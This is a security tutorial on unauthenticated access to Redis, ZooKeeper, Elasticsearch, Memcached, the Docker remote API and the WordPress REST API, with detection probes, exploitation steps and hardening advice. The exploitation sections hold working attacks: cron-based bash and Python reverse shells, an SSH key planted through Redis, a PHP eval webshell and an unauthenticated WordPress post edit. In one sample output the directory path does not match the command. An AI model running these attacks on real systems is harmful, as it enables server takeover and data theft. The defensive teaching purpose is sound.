1 Redis Unauthorized Access Vulnerability
1.1 Vulnerability Description
A fresh Redis installation has no username or password configured. If an unprotected instance is reachable over the network and runs with root privileges, an attacker can use it to spawn a reverse shell (bounce a shell) or write an SSH key, thereby gaining access to the server.
1.2 Vulnerability Detection

```python
import socket

host = "192.168.254.19"
port = 6384

s = socket.create_connection((host, port), timeout=5)
s.sendall(b"INFO\r\n")          # inline-command form of INFO
result = s.recv(1024).decode("utf-8", "replace")
s.close()
print(result)                    # This part can be commented out
# An unauthenticated instance answers INFO with its server section
if "redis_version" in result:
    print("exist vul")
```
Test the client connection:

```shell
$ redis-cli -h host -p port
host:port> CONFIG get requirepass
1) "requirepass"
2) ""
```

Explanation: an empty requirepass value means no password is set, which is the default.
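As an added example (not part of the original article), the following Python script encodes the probe as a proper RESP command and classifies the reply, so a defender can tell an exposed instance apart from one protected by requirepass or by protected mode; the host and port are placeholders, and the CONFIG GET reply used in the `__main__` block is a constructed sample.

```python
import socket

def resp_command(*args):
    """Encode a command as a RESP array, e.g. CONFIG GET requirepass."""
    out = b"*%d\r\n" % len(args)
    for arg in args:
        raw = arg.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out

def classify_reply(reply):
    """Classify the raw reply to an unauthenticated INFO probe."""
    if reply.startswith(b"-NOAUTH"):
        return "auth_required"      # requirepass is set: not exposed
    if reply.startswith(b"-DENIED"):
        return "protected_mode"     # Redis >= 3.2 refused a non-local client
    if reply.startswith(b"$") and b"redis_version" in reply:
        return "unauthenticated"    # INFO answered without AUTH: exposed
    return "unknown"

def parse_config_get(reply):
    """Parse the 2-element array reply of CONFIG GET into (key, value).
    Assumes neither element contains CRLF (true for requirepass)."""
    lines = reply.split(b"\r\n")
    if not lines or not lines[0].startswith(b"*2"):
        return None
    return lines[2].decode(), lines[4].decode()

def probe(host, port=6379, timeout=5.0):
    """Network probe (placeholder target): send INFO and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(resp_command("INFO", "server"))
        return classify_reply(s.recv(4096))

if __name__ == "__main__":
    # Constructed sample reply: what CONFIG GET requirepass returns when unset
    sample = b"*2\r\n$11\r\nrequirepass\r\n$0\r\n\r\n"
    print(parse_config_get(sample))           # ('requirepass', '')
    print(probe("192.168.254.19", 6384))      # placeholder target from the page
```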
1.3 Vulnerability Exploitation
1.3.1 Exploiting crontab to bounce shells
Listen on a port on your own server (10.0.0.2):

```shell
nc -lvnp 4444
```

Then connect to the target and execute the following commands in redis-cli:

```shell
redis-cli -h 10.0.0.1
set x "\n* * * * * bash -i >& /dev/tcp/10.0.0.2/4444 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
```
1.3.2 Writing an SSH public key to log in to the server
Conditions for exploitation:
1. Redis is exposed externally and allows unauthenticated access (the default configuration).
2. The server's SSH service is exposed externally and accepts key-based login.
The detailed attack method is as follows:
1. Prepare your own public key and write it to a local file, test.txt:

```shell
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
```

2. Write the file into Redis memory:

```shell
$ redis-cli -h 10.0.0.1 flushall
$ cat test.txt | redis-cli -h 10.0.0.1 -x set crackit
```

3. Use redis-cli to write the key out into the .ssh directory:

```shell
$ redis-cli -h 10.0.0.1
10.0.0.1:6379> config set dir /Users/nmask/.ssh/
OK
10.0.0.1:6379> config get dir
1) "dir"
2) "/Users/test/.ssh"
10.0.0.1:6379> config set dbfilename "authorized_keys"
OK
10.0.0.1:6379> save
OK
```
1.3.3 Obtaining a webshell on a web service
When Redis runs with low privileges but the server hosts a web service and the Redis process has write permission to the web directory, you can try writing a webshell to the web path:

```shell
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php @eval($_POST['test']);?>"
save
```

Explanation: executing the commands above writes the shell into the web directory.
1.4 Vulnerability Fix
Go to the Redis installation directory and edit the redis.conf file:
- Only listen on localhost by default:

```
bind 127.0.0.1
```

- Add a login password:

```
requirepass AbcXXXX
```

- Change the default port when the service must be exposed externally:

```
port 2333
```

- Finally, you can also use iptables to restrict access to the port.
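As an added example, not from the original article, here is a small Python audit of redis.conf that flags the weak state section 1 describes beside the hardened one from section 1.4. The two config texts are constructed samples; the checks for protected-mode and a renamed CONFIG command (both standard redis.conf directives) go beyond the page's three settings, because the exploitation steps above depend on CONFIG SET being available.

```python
# Constructed sample: an exposed instance in the state section 1 describes
WEAK_CONF = """
bind 0.0.0.0
port 6379
# requirepass foobared
protected-mode no
"""

# Constructed sample: hardened as in section 1.4, plus CONFIG disabled
HARDENED_CONF = """
bind 127.0.0.1 -::1
port 2333
requirepass AbcXXXX
protected-mode yes
rename-command CONFIG ""
"""

LOOPBACK = ("127.0.0.1", "::1", "localhost")

def parse_conf(text):
    """Return (directive, args) for each active line; comments/blanks skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = line.split()
            entries.append((parts[0].lower(), parts[1:]))
    return entries

def audit_redis_conf(text):
    """Return a list of findings; an empty list means no issue was spotted."""
    entries = parse_conf(text)
    last = dict(entries)                      # Redis takes the last occurrence
    renamed = {a[0].upper() for d, a in entries if d == "rename-command" and a}
    findings = []
    bind = last.get("bind", [])               # no bind line means all interfaces
    loopback_only = bool(bind) and all(b.lstrip("-") in LOOPBACK for b in bind)
    if not loopback_only:
        findings.append("bind: reachable on non-loopback interfaces")
    if not last.get("requirepass"):
        findings.append("requirepass: no password set")
    if last.get("protected-mode", ["yes"]) == ["no"]:
        findings.append("protected-mode: disabled")
    if not loopback_only and last.get("port", ["6379"]) == ["6379"]:
        findings.append("port: default 6379 exposed externally")
    if "CONFIG" not in renamed:
        findings.append("CONFIG: not renamed, so CONFIG SET dir/dbfilename is usable")
    return findings
```

Running `audit_redis_conf(WEAK_CONF)` yields five findings, while `audit_redis_conf(HARDENED_CONF)` returns an empty list.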
2 ZooKeeper Unauthorized Access Vulnerability
2.1 Vulnerability Description
ZooKeeper ships with no default username or password, i.e. no authentication at all. An attacker can exploit this remotely to collect sensitive information from the target server or to disrupt the ZooKeeper cluster.
2.2 Vulnerability Detection

```python
# coding=utf-8
import socket

ip = "192.168.36.218"
port = 2181

s = socket.create_connection((ip, port), timeout=5)
s.sendall(b"envi")               # four-letter-word command: dump server environment
result = s.recv(1024).decode("utf-8", "replace")
s.close()
print(result)  # Output detailed response
# Note: newer ZooKeeper releases only answer four-letter words listed in
# 4lw.commands.whitelist, so a silent server may simply have envi disabled
if "zookeeper.version" in result:
    print("exist vul")
```
2.3 Vulnerability Exploitation
Execute the following command to remotely obtain the server's environment:

```shell
echo envi | nc ip port
```

Connect directly with the ZooKeeper client:

```shell
./zkCli.sh -server ip:port
```
2.4 Vulnerability Fix
- Do not expose ZooKeeper directly to the public network unless necessary. If it must be exposed, harden it as follows:
- Set ACLs so that only trusted source IPs are allowed to connect.
3 Elasticsearch Unauthorized Access
3.1 Vulnerability Description
Elasticsearch, the storage and search component of the ELK log analysis stack, listens on port 9200 by default. If no access control is configured, anyone who can reach the port can perform unauthorized data operations.
3.2 Vulnerability Detection

```python
import http.client

conn = http.client.HTTPConnection("192.168.254.56", 9200, timeout=10)
conn.request("GET", "/_cat/master")
resp = conn.getresponse()
print(resp.status)
# A 200 without credentials means the cluster API is reachable unauthenticated
if resp.status == 200:
    print("exist vul")
conn.close()
```
3.3 Vulnerability Exploitation
The service is simply a REST API: anyone who can reach the address can call it to perform data operations, for example:

```
http://x.x.x.x:9200/_nodes
http://x.x.x.x:9200/_river
```
3.4 Vulnerability Fix
- Configure the firewall to block external access to port 9200.
- Use Nginx as a reverse proxy to add authentication in front of Elasticsearch.
- Restrict access by IP and bind the service to a fixed address.
- Set authentication for port 9200 in config/elasticsearch.yml. Note that the http.basic.* settings below come from the third-party elasticsearch-http-basic plugin rather than from Elasticsearch itself; current releases ship built-in security features instead:

```yaml
http.basic.enabled: true            # Switch; when enabled it takes over all HTTP connections
http.basic.user: "admin"            # Account
http.basic.password: "admin_pw"     # Password
http.basic.ipwhitelist: ["localhost", "127.0.0.1"]
```
4 Memcached Unauthorized Access
4.1 Vulnerability Description
Memcached is a commonly used key-value caching system that does not have an access control module. Therefore, attackers can directly read sensitive information from Memcached through command interaction.
4.2 Vulnerability Detection

```python
import socket

ip = "192.168.254.19"    # placeholder target
port = 11211

s = socket.create_connection((ip, port), timeout=5)
s.sendall(b"stats\r\n")  # text-protocol commands are terminated by CRLF
result = s.recv(1024).decode("utf-8", "replace")
s.close()
if "STAT version" in result:
    print("exist vul")
```
4.3 Vulnerability Exploitation

```shell
nc -vv <target> 11211
```

Explanation: if the connection succeeds, the data held in Memcached can be read.
4.4 Vulnerability Fix
- Set Memcached to only allow local access.
- Disable external access to Memcached port 11211.
- Compile with --enable-sasl to enable SASL authentication.
5 Docker Unauthorized Access
5.1 Vulnerability Description
The Docker Remote API is a REST API that replaced the remote command line interface (rcli). It can be accessed through the Docker client or over plain HTTP and allows creating containers, deleting existing containers, and even obtaining a shell on the host machine.
5.2 Vulnerability Detection

```python
import http.client

ip, port, TIMEOUT = "192.168.254.19", 2375, 10  # placeholder target
conn = http.client.HTTPConnection(ip, port, timeout=TIMEOUT)
conn.request("GET", "/containers/json")
resp = conn.getresponse()
# The container list is only returned without credentials when the API is exposed
if resp.status == 200 and "HostConfig" in resp.read().decode("utf-8", "replace"):
    print("exist vul")
```
5.3 Vulnerability Exploitation
List the containers on the host:

```
http://host:2375/containers/json
```

The way to get a shell is similar to the Redis exploitation.
5.3.1 Exploiting cron tasks to bounce shells

```shell
echo -e "*/1 * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",8088));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" >> /etc/crontab
```
5.4 Vulnerability Fix
- Do not enable Docker's remote API service unless necessary. If it must be enabled, you can use the following hardening methods:
- Set ACLs so that only trusted source IPs are allowed to connect.
- Set up TLS authentication (official documentation: "Protect the Docker daemon socket"). The client then needs the following environment variables when connecting:

```shell
export DOCKER_TLS_VERIFY=1
export DOCKER_CERT_PATH=~/.docker
export DOCKER_HOST=tcp://10.10.10.10:2375
export DOCKER_API_VERSION=1.12
```

- Put a proxy such as Nginx in front of the Docker API server and set up HTTP (401) authentication.
6 WordPress Unauthorized Access Vulnerability
6.1 Vulnerability Description
The REST API was added in WordPress 4.7.0 and is enabled by default. Attackers can use this vulnerability to inject malicious content and elevate privileges, allowing them to modify posts, pages, and other content.
6.2 Vulnerability Exploitation
View the list of posts:

```http
GET /index.php/wp-json/wp/v2/posts HTTP/1.1
```

Modify the content of a post:

```http
POST /index.php/wp-json/wp/v2/posts/500?id=500 HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Type: application/json
Content-Length: 43

{"title":"x x x x"}
```

Explanation: a 401 response means there is no permission to modify; a 200 response means the modification succeeded.
Reference Articles
https://www.secpulse.com/archives/61101.html
https://www.secpulse.com/archives/40406.html
http://www.freebuf.com/vuls/126120.html
https://thief.one/2017/12/08/1/